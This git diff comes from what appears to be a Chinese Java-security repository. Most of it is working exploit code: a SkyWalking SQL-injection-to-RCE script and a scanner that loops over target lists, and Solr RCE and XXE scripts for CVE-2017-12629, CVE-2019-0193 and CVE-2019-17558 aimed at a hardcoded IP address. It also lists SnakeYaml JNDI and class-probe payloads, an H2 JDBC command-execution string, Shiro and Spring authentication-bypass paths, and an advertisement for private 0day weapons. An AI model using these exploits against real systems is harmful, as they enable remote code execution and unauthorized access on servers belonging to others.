b/RASP/Readme.md new file mode 100644 index 0000000..fc2ac3f --- /dev/null +++ b/RASP/Readme.md @@ -0,0 +1,61 @@ +# RASP + +Runtime application self-protection + +它是一种新型应用安全保护技术,它将保护程序像疫苗一样注入到应用程序中,应用程序融为一体,能实时检测和阻断安全攻击,使应用程序具备自我保护能力,当应用程序遭受到实际攻击伤害,就可以自动对其进行防御,而不需要进行人工干预。 + + + +RASP技术可以快速的将安全防御功能整合到正在运行的应用程序中,它拦截从应用程序到系统的所有调用,确保它们是安全的,并直接在应用程序内验证数据请求。Web和非Web应用程序都可以通过RASP进行保护。该技术不会影响应用程序的设计,因为RASP的检测和保护功能是在应用程序运行的系统上运行的。 + +### 使用 + +https://github.com/baidu/openrasp + +安装:java -jar RaspInstall.jar -install tomcat目录 + +配置环境变量: 新建 CATALINE_HOME 值为tomcat目录 + +在tomcat目录的bin下执行cataline.bat run + +测试curl -v 127.0.0.1:8888 |grep OpenRASP + +服务器的响应 X-Protected-By: OpenRASP + +### 测试 + +https://github.com/baidu-security/openrasp-testcases + +日志:\rasp\logs\alarm\alarm.log + +### 实现 + +java中是通过Java Agent方式进行实现 + +**是通过java的agent配合asm对运行的字节码进行了修改,这样就达到了埋点hook的目的。** + +PHP是通过开发第php扩展库来进行实现。 + +.NET是通过IHostingStartup(承载启动)实现 + + + +**RASP技术其实主要就是对编程语言的危险底层函数进行hook**,毕竟在怎么编码转换以及调用,最后肯定会去执行最底层的某个方法然后对系统进行调用。由此可以反推出其hook点,然后使用不同的编程语言中不同的技术对其进行实现。 + + + +### 学习 + +https://blog.csdn.net/HY1273383167/article/details/116211211 1 + +https://blog.csdn.net/u011721501/article/details/74990346 1 + +https://www.freebuf.com/articles/web/197823.html + +https://paper.seebug.org/1041/ + +https://blog.csdn.net/u011721501/article/details/74990346 + +https://paper.seebug.org/330/ + + diff --git a/README.md b/README.md index 451b433..907e11b 100644 --- a/README.md +++ b/README.md @@ -2,11 +2,49 @@ 可能有一部分是java的基础语法 和一些java安全,主要是java安全和java框架漏洞的复现,加一些代码审计 -+ 2021/7/30 [添加了java的一些命令执行shell](shell) 💛 💙 💜 ❤️ 💚 -+ 2021/8/15 [添加了Java日常知识点](java日常) 💛 💙 💜 ❤️ 💚 -+ 2021/8/31 [添加了jackson序列化的exp](jackson) 💛 💙 💜 ❤️ 💚 -+ 2021/9/06 [添加Shiro其他漏洞](Shiro) 💛 💙 💜 ❤️ 💚 -+ 2021/9/06 [添加SnakeYaml序列化漏洞和trick](SnakeYaml) 💛 💙 💜 ❤️ 💚 -+ 2021/9/08 [添加序列化链](java序列化链) 💛 💙 💜 ❤️ 💚 -+ 2021/9/15 [添加java模板注入](java模板注入) 💛 💙 💜 ❤️ 💚 -+ 2021/9/18 [添加java小型框架](java小型框架) 💛 💙 💜 ❤️ 💚 ++ 2021/7/30 [添加了java的一些命令执行shell](shell) 💛 💙 💜 ❤️ 💚 ++ 2021/8/15 [添加了Java日常知识点](java日常) 💛 💙 💜 ❤️ 💚 ++ 2021/8/31 [添加了jackson序列化的exp](jackson) 💛 💙 💜 ❤️ 💚 ++ 2021/9/06 [添加Shiro其他漏洞](Shiro) 💛 💙 💜 ❤️ 💚 ++ 2021/9/06 [添加SnakeYaml序列化漏洞和trick](SnakeYaml) 💛 💙 💜 ❤️ 💚 ++ 2021/9/08 [添加序列化链](java序列化链) 💛 💙 💜 ❤️ 💚 ++ 2021/9/15 [添加java模板注入](java模板注入) 💛 💙 💜 ❤️ 💚 ++ 2021/9/18 [添加java小型框架](java小型框架) 💛 💙 💜 ❤️ 💚 **添加了渗透的思路** ++ 2021/9/25 [添加java回显](java回显) 💛 💙 💜 ❤️ 💚 ++ 2021/10/3 [添加Weblogic漏洞](Weblogic) 💛 💙 💜 ❤️ 💚 ++ 2021/10/15 [添加MyBatis的CVE-2020-26945](MyBatis) 💛 💙 💜 ❤️ 💚 ++ 2021/10/20 [添加BypassSM](BypassSM) 💛 💙 💜 ❤️ 💚 ++ 2021/10/25 [添加Xstream](Xstream) 💛 💙 💜 ❤️ 💚 ++ 2021/11/19 [添加Springboot](Springboot) 💛 💙 💜 ❤️ 💚 ++ 2021/12/17 [添加Springcloud](Springcolud) 💛 💙 💜 ❤️ 💚 ++ 2021/12/17 [添加jbdc](Jdbc) 💛 💙 💜 ❤️ 💚 ++ 2021/12/19 [添加Jenkins](Jenkins) 💛 💙 💜 ❤️ 💚 ++ 2022/01/14 [添加了dubbo漏洞分析](Dubbo) 💛 💙 💜 ❤️ 💚 ++ 2022/01/16 [添加CAS漏洞学习](CAS) 💛 💙 💜 ❤️ 💚 ++ 2022/03/18 [添加Solr利用exp](Solr) 💛 💙 💜 ❤️ 💚 ++ 2022/10/07 [添加jvm的学习笔记](JVM) 💛 💙 💜 ❤️ 💚 ++ 2022/10/07 [添加JDK里面的trick](Jdk) 💛 💙 💜 ❤️ 💚 + + +## 知识星球 +该知识星球主要是分享java相关的安全知识,绝对精华.里面包含未开放的1day和0day等分享或武器化工具一发入魂 + +![image](https://user-images.githubusercontent.com/63966847/214033050-87bdd0f8-4982-4aac-b79d-a5b6d0f107b9.png) + + + +## 代学习 + +[java设计模式](https://www.runoob.com/design-pattern/design-pattern-tutorial.html) :heavy_check_mark: +[jvm学习]() 正在学习中. + +## 说明 +目前该项目更新可能会慢一些,更新的基本上是在[添加了Java日常知识点](java日常)中记录自己感觉有意思的文章和小trick,希望对你有帮助. + +如果你遇到了很好的文章非常欢迎提交issues. + + +## Stargazers over time + +[![Stargazers over time](https://starchart.cc/Firebasky/Java.svg)](https://starchart.cc/Firebasky/Java) + diff --git "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" index 59ef745..6073000 100644 --- "a/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" +++ "b/Shiro/Shiro\346\235\203\351\231\220\347\273\225\350\277\207/Readme.md" @@ -41,6 +41,8 @@ https://github.com/apache/shiro/commit/3708d7907016bf2fa12691dff6ff0def1249b8ce# ## CVE-2020-11989 +[Apache Shiro权限绕过漏洞CVE-2020-11989分析](https://www.anquanke.com/post/id/222489) + **payload:/admin/%252fxxx** 漏洞产生的原因是因为 Spring 与 Shiro 之间对 url 的处理不同从而导致权限绕过. @@ -145,13 +147,18 @@ pom.xml 中版本修改为 1.7.0 或及以下即可 /login/..;/admin/ /login/..;/json +/actuator/;/env/ +/admin/;/xxx /admin/%3b/xxx /admin/%252fxxx /admin/%3Bxx /admin/%20 ``` +## CVE-2022-32532 +[CVE-2022-32532](https://github.com/4ra1n/CVE-2022-32532) +原理参考[CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过及转发流程分析](https://xz.aliyun.com/t/11473) >参考: > diff --git a/SkyWalking/Readme.md b/SkyWalking/Readme.md new file mode 100644 index 0000000..8ad9aa3 --- /dev/null +++ b/SkyWalking/Readme.md @@ -0,0 +1,12 @@ +# SkyWalking + + + +> Apache Skywalking是一款针对分布式系统的应用程序性能监视工具,为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计。 + +## sql->RCE + +https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw + +https://github.com/vulhub/vulhub/blob/master/skywalking/8.3.0-sqli/README.zh-cn.md + diff --git a/SkyWalking/tool/exp.py b/SkyWalking/tool/exp.py new file mode 100644 index 0000000..a5a2272 --- /dev/null +++ b/SkyWalking/tool/exp.py @@ -0,0 +1,62 @@ +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky + +# https://mp.weixin.qq.com/s/hB-r523_4cM0jZMBOt6Vhw +# https://cloud.tencent.com/developer/article/1939867 + +import requests +import urllib3 + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + + +burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:84.0) Gecko/20100101 Firefox/84.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", + "Accept-Encoding": "gzip, deflate", "Content-Type": "application/json;charset=utf-8", + "Origin": "http://192.168.18.240:8080", "Connection": "close", + "Referer": "http://192.168.18.240:8080/log"} + +payload = 'CAFEBABE000000.............' +ClassName = 'Evil' +JndiUrl = 'ldap://0.0.0.0:8888' + + +def exp(burp0_url): + burp0_json1 = {"query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", "variables": {"condition": {"endpointId": "1", "metricName": "INFORMATION_SCHEMA.USERS union all select file_write('"+payload+"','"+ClassName+".class'))a where 1=? or 1=? or 1=? --", "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", "stateCode": "1", "traceId": "1"}}} + try: + requests.post(burp0_url, headers=burp0_headers, json=burp0_json1, verify=False, allow_redirects=False, timeout=2) + except: + pass + # 触发 + burp0_json2={"query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", "variables": {"condition": {"endpointId": "1", "metricName": "INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','"+ClassName+"','jdbc:h2:./test2','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --", "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", "stateCode": "1", "traceId": "1"}}} + try: + requests.post(burp0_url, headers=burp0_headers, json=burp0_json2, verify=False, allow_redirects=False, timeout=2) + except: + pass + + +def jndi(burp0_url): + burp0_json = { + "query": "query queryLogs($condition: LogQueryCondition) {\r\n logs: queryLogs(condition: $condition) {\r\n data: logs {\r\n serviceName serviceId serviceInstanceName serviceInstanceId endpointName endpointId traceId timestamp isError statusCode contentType content\r\n }\r\n total\r\n }\r\n }", + "variables": {"condition": {"endpointId": "1", + "metricName": "INFORMATION_SCHEMA.USERS union all select LINK_SCHEMA('TEST2','javax.naming.InitialContext','"+JndiUrl+"','sa','sa','PUBLIC'))a where 1=? or 1=? or 1=? --", + "paging": {"needTotal": True, "pageNum": 1, "pageSize": 1}, "state": "ALL", + "stateCode": "1", "traceId": "1"}}} + try: + requests.post(burp0_url, headers=burp0_headers, json=burp0_json, verify=False, allow_redirects=False, timeout=2) + except: + pass + + +def fileTarget(file): + with open(file) as url_txt: + urls = url_txt.readlines() + for url in urls: + url = url.replace('\n', '') + jndi(url+'/graphql') + + +if __name__ == '__main__': + fileTarget('vulip.txt') diff --git a/SkyWalking/tool/scan.py b/SkyWalking/tool/scan.py new file mode 100644 index 0000000..77d860b --- /dev/null +++ b/SkyWalking/tool/scan.py @@ -0,0 +1,104 @@ +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +import argparse +import threading +import requests +import urllib3 + + +urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning) + +# 利用脚本 + +result = [] # 结果 + +info = 'Apache Skywalking 8.3.0 SQL Injection Vulnerability' + + +# 添加 +endpoints = [ + '/graphql', +] + + +headers = { + 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko/20100101 Firefox/67.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8', + 'Content-Type': 'application/json', + 'Cookie': 'ADMINCONSOLESESSION=1hDwvQkPnPmLyDpwJvBL1qWTyXLYvQqSlMvJv3h7xyTxz5BJtGm3!1162256454', + 'X-Forwarded-For': '127.0.0.1', + 'X-Client-IP': '127.0.0.1', + 'X-Remote-IP': '127.0.0.1', + 'X-Remote-Addr': '127.0.0.1', + 'X-Originating-IP': '127.0.0.1', +} + +proxy = { + 'http': '127.0.0.1:8080' +} + + +def save(result): + file = open('result.txt', 'w') + for line in result: + file.write(line + '\n') + file.close() + + +def Scan_http(url, socket_proxies): + FLAG = False + payload = { + "query": "query queryLogs($condition: LogQueryCondition) {\r\n queryLogs(condition: $condition) {\r\n total\r\n logs {\r\n serviceId\r\n serviceName\r\n isError\r\n content\r\n }\r\n }\r\n}\r\n", + "variables": {"condition": {"metricName": "sqli", "paging": {"pageSize": 10}, "state": "ALL"}}} + + for endpoint in endpoints: + try: + res = requests.post(url+endpoint, json=payload, headers=headers, timeout=2, verify=False, proxies=socket_proxies, allow_redirects=False) + if "sqli" in res.text and res.status_code == 200: + FLAG=True + result.append(url+' 存在'+info) + print(url+'\033[1;31m存在'+info+'\033[0m') + break + except: + pass + if not FLAG: + print(url+"扫描完成不存在漏洞") + + +def fileTarget(file, socket_proxies): + with open(file) as url_txt: + urls = url_txt.readlines() + for url in urls: + url = url.replace('\n', '') + Scan_http(url, socket_proxies) + save(result) + + +def multiRun(file, socket_proxies): + t = threading.Thread(target=fileTarget, args=(file, socket_proxies)) + t.start() + t.join() + + + +if __name__ == '__main__': + parser = argparse.ArgumentParser(description=info+'scanner') + parser.add_argument('-f', default=None, help='read target url from file') + parser.add_argument('-u', default=None, help='target url') + parser.add_argument('-proxy', default=None, help='-proxy socks5://0.0.0.0:8088') + args = parser.parse_args() + socket_proxies = None + if args.proxy: + socket_proxies = { + 'http': args.proxy + } + if args.u: + Scan_http(args.u, socket_proxies) + exit(0) + if args.f: + multiRun(args.f, socket_proxies) + exit(0) + else: + parser.print_help() + exit(0) diff --git a/SnakeYaml/Readme.md b/SnakeYaml/Readme.md new file mode 100644 index 0000000..b14e92b --- /dev/null +++ b/SnakeYaml/Readme.md @@ -0,0 +1,33 @@ +# snakeyaml + +## 不出网利用 +>通过写文件然后本地加载rce + +//todo 写一个工具 去完成 已经完成了 + + +https://xz.aliyun.com/t/10655 + +限制了class,不过存在class bean中有object属性 参考: https://mp.weixin.qq.com/s/7HJXfNibY9Z3DPGarTqyZQ + +加载本地 +```java +String data2 = "!!javax.script.ScriptEngineManager [\n" + + " !!java.net.URLClassLoader [[\n" + + " !!java.net.URL [\"file:E:/yaml-payload.jar\"]\n" + + " ]]\n" + + "]"; +``` + +## 判断类存在 +```java + String poc = "[!!判断的类全类名 []: 0, !!java.net.URL [null, \"http://ixvoxg.dnslog.cn\"]: 1]"; +``` + +## 其他链 一般是jndi + +``` +!!com.sun.rowset.JdbcRowSetImpl {dataSourceName: "rmi://xxxx", autoCommit: true} +``` + +参考: https://www.mi1k7ea.com/2019/11/29/Java-SnakeYaml%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E diff --git a/Solr/README.md b/Solr/README.md index 2edc0c1..cc7d06c 100644 --- a/Solr/README.md +++ b/Solr/README.md @@ -1,4 +1,191 @@ # Apache Solr漏洞 **Apache Solr是一个开源的搜索服务,使用Java语言开发,主要基于HTTP和Apache Lucene实现的。** +>Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 -Solr是一个高性能,采用Java5开发,基于Lucene的全文搜索服务器。Solr是一个独立的企业级搜索应用服务器,很多企业运用solr开源服务。原理大致是文档通过Http利用XML加到一个搜索集合中。查询该集合也是通过 http收到一个XML/JSON响应来实现。它的主要特性包括:高效、灵活的缓存功能,垂直搜索功能,高亮显示搜索结果,通过索引复制来提高可用性,提 供一套强大Data Schema来定义字段,类型和设置文本分析,提供基于Web的管理界面等。 + +https://github.com/Imanfeng/Apache-Solr-RCE + +## CVE-2017-12629 + +[CVE-2017-12629 - Apache Solr XXE & RCE 漏洞分析](https://paper.seebug.org/425/) + +```python +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +# xxe and rce +import requests +from urllib.parse import quote + +ip='101.35.196.173' +port='8983' + +''' + +"> +''' +def xxe(url): + exp = "%ext;%ent;]>&data;" + text = quote(exp, 'utf-8') + burp0_url = "http://"+ip+":"+port+"/solr/demo/select?q="+text+"&wt=xml&defType=xmlparser" + get = requests.get(burp0_url) + print(get.text) + +# 依据漏洞作者所披露的漏洞细节来看,RCE需要使用到SolrCloud Collections API,所以RCE只影响Solrcloud分布式系统。 +# /solr/admin/cores?wt=json 判断 +def rce(cmd):#不稳定,并且不知道路径 + burp0_url = "http://"+ip+":"+port+"/solr/demo/config" + burp0_headers = {"Accept": "*/*", "Accept-Language": "en", + "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)", + "Connection": "close"} + burp0_json = { + "add-listener": {"args": ["-c", cmd], "class": "solr.RunExecutableListener", "dir": "/bin/", + "event": "postCommit", "exe": "sh", "name": "newlistener"}} + requests.post(burp0_url, headers=burp0_headers, json=burp0_json) + + burp0_json2=[{"id": "test"}] + requests.post(burp0_url, headers=burp0_headers, json=burp0_json2) + +if __name__ == '__main__': + # xxe("http://101.35.196.173:8080/do.dtd") + rce("touch /tmp/1") +``` + +## CVE-2019-0192 + +https://github.com/mpgn/CVE-2019-0192/blob/master/CVE-2019-0192.py + +## CVE-2019-0193 + +https://www.yuque.com/tianxiadamutou/zcfd4v/uyceyo#4785516e + +```python +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +import requests +from urllib.parse import quote + +def getinfo(remote): + burp0_url = remote + "/solr/admin/cores?wt=json" + r = requests.get(burp0_url, verify=False, allow_redirects=False) + if r.status_code == 200: + a = list(r.json()['status'].keys()) + # ressource = "/solr/" + a[0] + "/config" + # print(ressource) + return a[0] + else: + exit(0) + +#需要出网 +def exp1(url,info,cmd): + burp0_url = url+"/solr/"+info+"/dataimport?_=1647571813629&indent=on&wt=json" + burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", + "Content-type": "application/x-www-form-urlencoded", "Connection": "close"} + burp0_data = {"command": "full-import", "verbose": "false", "clean": "false", "commit": "true", "debug": "true", + "core": "test", + "dataConfig": "\n \n \n \n \n \n", + "name": "dataimport"} + post = requests.post(burp0_url, headers=burp0_headers, data=burp0_data) + print(post.json()['documents']) + +def exp2(url,info,cmd): + burp0url = url+"/solr/"+info+"/config" + headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", + "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", + "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", + "Content-Type": "application/json"} + burp0_json = {"set-property": {"requestDispatcher.requestParsers.enableStreamBody": True}} + requests.post(burp0url, headers=headers, json=burp0_json) + + exp=''' + + + + + + + + ''' + text = quote(exp, 'utf-8') + text ="%0a%3c%64%61%74%61%43%6f%6e%66%69%67%3e%0a%3c%64%61%74%61%53%6f%75%72%63%65%20%6e%61%6d%65%3d%22%73%74%72%65%61%6d%73%72%63%22%20%74%79%70%65%3d%22%43%6f%6e%74%65%6e%74%53%74%72%65%61%6d%44%61%74%61%53%6f%75%72%63%65%22%20%6c%6f%67%67%65%72%4c%65%76%65%6c%3d%22%54%52%41%43%45%22%20%2f%3e%0a%0a%20%20%3c%73%63%72%69%70%74%3e%3c%21%5b%43%44%41%54%41%5b%0a%20%20%20%20%20%20%20%20%20%20%66%75%6e%63%74%69%6f%6e%20%70%6f%63%28%72%6f%77%29%7b%0a%20%76%61%72%20%62%75%66%52%65%61%64%65%72%20%3d%20%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%42%75%66%66%65%72%65%64%52%65%61%64%65%72%28%6e%65%77%20%6a%61%76%61%2e%69%6f%2e%49%6e%70%75%74%53%74%72%65%61%6d%52%65%61%64%65%72%28%6a%61%76%61%2e%6c%61%6e%67%2e%52%75%6e%74%69%6d%65%2e%67%65%74%52%75%6e%74%69%6d%65%28%29%2e%65%78%65%63%28%22"+quote(cmd,'utf-8')+"%22%29%2e%67%65%74%49%6e%70%75%74%53%74%72%65%61%6d%28%29%29%29%3b%0a%0a%76%61%72%20%72%65%73%75%6c%74%20%3d%20%5b%5d%3b%0a%0a%77%68%69%6c%65%28%74%72%75%65%29%20%7b%0a%76%61%72%20%6f%6e%65%6c%69%6e%65%20%3d%20%62%75%66%52%65%61%64%65%72%2e%72%65%61%64%4c%69%6e%65%28%29%3b%0a%72%65%73%75%6c%74%2e%70%75%73%68%28%20%6f%6e%65%6c%69%6e%65%20%29%3b%0a%69%66%28%21%6f%6e%65%6c%69%6e%65%29%20%62%72%65%61%6b%3b%0a%7d%0a%0a%72%6f%77%2e%70%75%74%28%22%74%69%74%6c%65%22%2c%72%65%73%75%6c%74%2e%6a%6f%69%6e%28%22%5c%6e%5c%72%22%29%29%3b%0a%72%65%74%75%72%6e%20%72%6f%77%3b%0a%0a%7d%0a%0a%5d%5d%3e%3c%2f%73%63%72%69%70%74%3e%0a%0a%3c%64%6f%63%75%6d%65%6e%74%3e%0a%20%20%20%20%3c%65%6e%74%69%74%79%0a%20%20%20%20%20%20%20%20%73%74%72%65%61%6d%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%6e%61%6d%65%3d%22%65%6e%74%69%74%79%31%22%0a%20%20%20%20%20%20%20%20%64%61%74%61%73%6f%75%72%63%65%3d%22%73%74%72%65%61%6d%73%72%63%31%22%0a%20%20%20%20%20%20%20%20%70%72%6f%63%65%73%73%6f%72%3d%22%58%50%61%74%68%45%6e%74%69%74%79%50%72%6f%63%65%73%73%6f%72%22%0a%20%20%20%20%20%20%20%20%72%6f%6f%74%45%6e%74%69%74%79%3d%22%74%72%75%65%22%0a%20%20%20%20%20%20%20%20%66%6f%72%45%61%63%68%3d%22%2f%52%44%46%2f%69%74%65%6d%22%0a%20%20%20%20%20%20%20%20%74%72%61%6e%73%66%6f%72%6d%65%72%3d%22%73%63%72%69%70%74%3a%70%6f%63%22%3e%0a%20%20%20%20%20%20%20%20%20%20%20%20%20%3c%66%69%65%6c%64%20%63%6f%6c%75%6d%6e%3d%22%74%69%74%6c%65%22%20%78%70%61%74%68%3d%22%2f%52%44%46%2f%69%74%65%6d%2f%74%69%74%6c%65%22%20%2f%3e%0a%20%20%20%20%3c%2f%65%6e%74%69%74%79%3e%0a%3c%2f%64%6f%63%75%6d%65%6e%74%3e%0a%3c%2f%64%61%74%61%43%6f%6e%66%69%67%3e%0a%20%20%20%20%0a%20%20%20%20%20%20%20%20%20%20%20" + burp0_url = url+"/solr/"+info+"/dataimport?command=full-import&verbose=false&clean=false&commit=false&debug=true&core=tika&name=dataimport&dataConfig="+text + burp0_headers = {"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:66.0) Gecko/20100101 Firefox/66.0", + "Accept": "application/json, text/plain, */*", + "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", + "Accept-Encoding": "gzip, deflate", + "content-type": "multipart/form-data; boundary=------------------------aceb88c2159f183f"} + burp0_data = "\r\n--------------------------aceb88c2159f183f\r\nContent-Disposition: form-data; name=\"stream.body\"\r\n\r\n\r\n\r\n\r\n\r\n\r\n--------------------------aceb88c2159f183f--" + requests_post = requests.post(burp0_url, headers=burp0_headers, data=burp0_data) + print(requests_post.json()['documents']) + +if __name__ == '__main__': + info = getinfo("http://101.35.196.173:8983") + # exp1("http://101.35.196.173:8983",info,"ls /tmp/") + exp2("http://101.35.196.173:8983",info,'ls /tmp/') +``` + +**jndi注入** + +``` + + + + + + + +``` + +## CVE-2019-17558 + +https://github.com/jas502n/solr_rce + +```python +# -*- coding: utf-8 -* +# /usr/bin/python3 +# @Author:Firebasky +# 在其 5.0.0 到 8.3.1版本中,用户可以注入自定义模板,通过Velocity模板语言执行任意命令。 +import requests + +url ="http://101.35.196.173:8983" +cmd ="ls" + +burp0_url = url + "/solr/admin/cores?wt=json" +r = requests.get(burp0_url, verify=False, allow_redirects=False) +a = list(r.json()['status'].keys()) + +burp0_url = url+"/solr/"+a[0]+"/config" +burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close", "Content-Type": "application/json"} +burp0_json={"update-queryresponsewriter": {"class": "solr.VelocityResponseWriter", "name": "velocity", "params.resource.loader.enabled": "true", "solr.resource.loader.enabled": "true", "startup": "lazy", "template.base.dir": ""}} +requests.post(burp0_url, headers=burp0_headers, json=burp0_json) + +burp0_url = url+"/solr/"+a[0]+"/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27"+cmd+"%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end" +burp0_headers = {"Accept": "application/json, text/plain, */*", "X-Requested-With": "XMLHttpRequest", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9", "Connection": "close"} +get = requests.get(burp0_url, headers=burp0_headers) +print(get.text) +``` + +## 任意文件删除 + +https://mp.weixin.qq.com/s/JXBiQR3q7ykITVFBwm_9Vg diff --git a/Spring/Readme.md b/Spring/Readme.md index 93a82aa..d48eb5c 100644 --- a/Spring/Readme.md +++ b/Spring/Readme.md @@ -4,3 +4,19 @@ + [cve-2016-4977]() + [cve-2017-4971]() + [cve-2018-1270]() + +## Spring Security ++ [Spring Security / MVC Path Matching Inconsistency(CVE-2016-5007)](https://mp.weixin.qq.com/s?__biz=MzAwMzI0MTMwOQ==&mid=2650173852&idx=1&sn=6b4a6c36c456b5e475b5247451c6dd81&chksm=833cf5aeb44b7cb895e1f67f8f6680e1a22124ce5e9e38d8a5e5321099f40e8acc01ac9e3c85&scene=4#wechat_redirect) + +``` +/%0dadmin +``` + ++ [CVE-2022-22978 Spring Security RegexRequestMatcher 认证绕过漏洞与利用场景分析](https://mp.weixin.qq.com/s?__biz=Mzg3MTU0MjkwNw==&mid=2247490023&idx=1&sn=f7e654f69ceca1ff437d9431bdd8ffa7&chksm=cefda0f3f98a29e5556a31b28ba231613e49b0ff40fcee651fac351adc6376e2ad2b72509dbf&mpshare=1&scene=23&srcid=0521LQrB49HRCgrnaPZOD2ys&sharer_sharetime=1653110684149&sharer_shareid=33fdea7abe6be586e131951d667ccd06#rd) + +原理就是默认情况下, 正则表达式中点(.)不会匹配换行符, 设置了Pattern.DOTALL模式, 才会匹配所有字符包括换行符。从而绕过 + +![image](https://user-images.githubusercontent.com/63966847/169652431-125a8ebd-251d-4fec-a8dd-be20a3c60da5.png) + + +小知识:[Java中正则表达式(regex)匹配多行(Pattern.MULTILINE和Pattern.DOTALL模式)](https://www.cjavapy.com/article/68/) diff --git a/Springboot/CVE-2021-21234/Readme.md b/Springboot/CVE-2021-21234/Readme.md new file mode 100644 index 0000000..3dda468 --- /dev/null +++ b/Springboot/CVE-2021-21234/Readme.md @@ -0,0 +1,5 @@ +# Spring Boot 目录遍历(CVE-2021-21234) + +>spring-boot-actuator-logview 是一个简单的日志文件查看器作为Spring Boot执行器端点,在 0.2.13 版本之前存在着目录遍历漏洞,编号 CVE-2021-21234。漏洞本质是Spring Boot 执行器通过请求的参数来指定文件名和文件夹路径,经过组合拼接达到目录遍历,虽然源码中检查了文件名(filename)参数来防止目录遍历,但是没有检查文件夹(base)参数,造成了目录遍历 + +https://www.freebuf.com/vuls/293243.html diff --git a/Springboot/Readme.md b/Springboot/Readme.md new file mode 100644 index 0000000..63baee0 --- /dev/null +++ b/Springboot/Readme.md @@ -0,0 +1,17 @@ +# Springboot 漏洞 + +参考:https://github.com/LandGrey/SpringBootVulExploit +写的非常全. + +**该系列漏洞主要是通过env的配置接口进行配置,刷新或者重启触发漏洞** + +补:0x07:h2 database console JNDI RCE + +限制: +开启 -webAllowOthers 选项,支持外网访问 +开启 -ifNotExists 选项,支持创建数据库 + +不需要出网利用: +``` +language=en&setting=Generic+H2+%28Embedded%29&name=Generic+H2+%28Embedded%29&driver=org.h2.Driver&url=jdbc%3ah2%3amem%3atest%3bMODE%3dMSSQLServer%3binit%3dCREATE+TRIGGER+shell3+BEFORE+SELECT+ON+INFORMATION_SCHEMA.TABLES+AS+$$//javascript%0a%0ajava.lang.Runtime.getRuntime().exec('cmd+/c+calc.exe')$$&user=sa&password= +``` diff --git a/Springcolud/Readme.md b/Springcolud/Readme.md new file mode 100644 index 0000000..ffe3da9 --- /dev/null +++ b/Springcolud/Readme.md @@ -0,0 +1,61 @@ +# Springcolud + +## CVE-2021-22053 + +>今天有幸看到了三梦师傅写的[CVE-2021-22053: Spring Cloud Netflix Dashboard template resolution 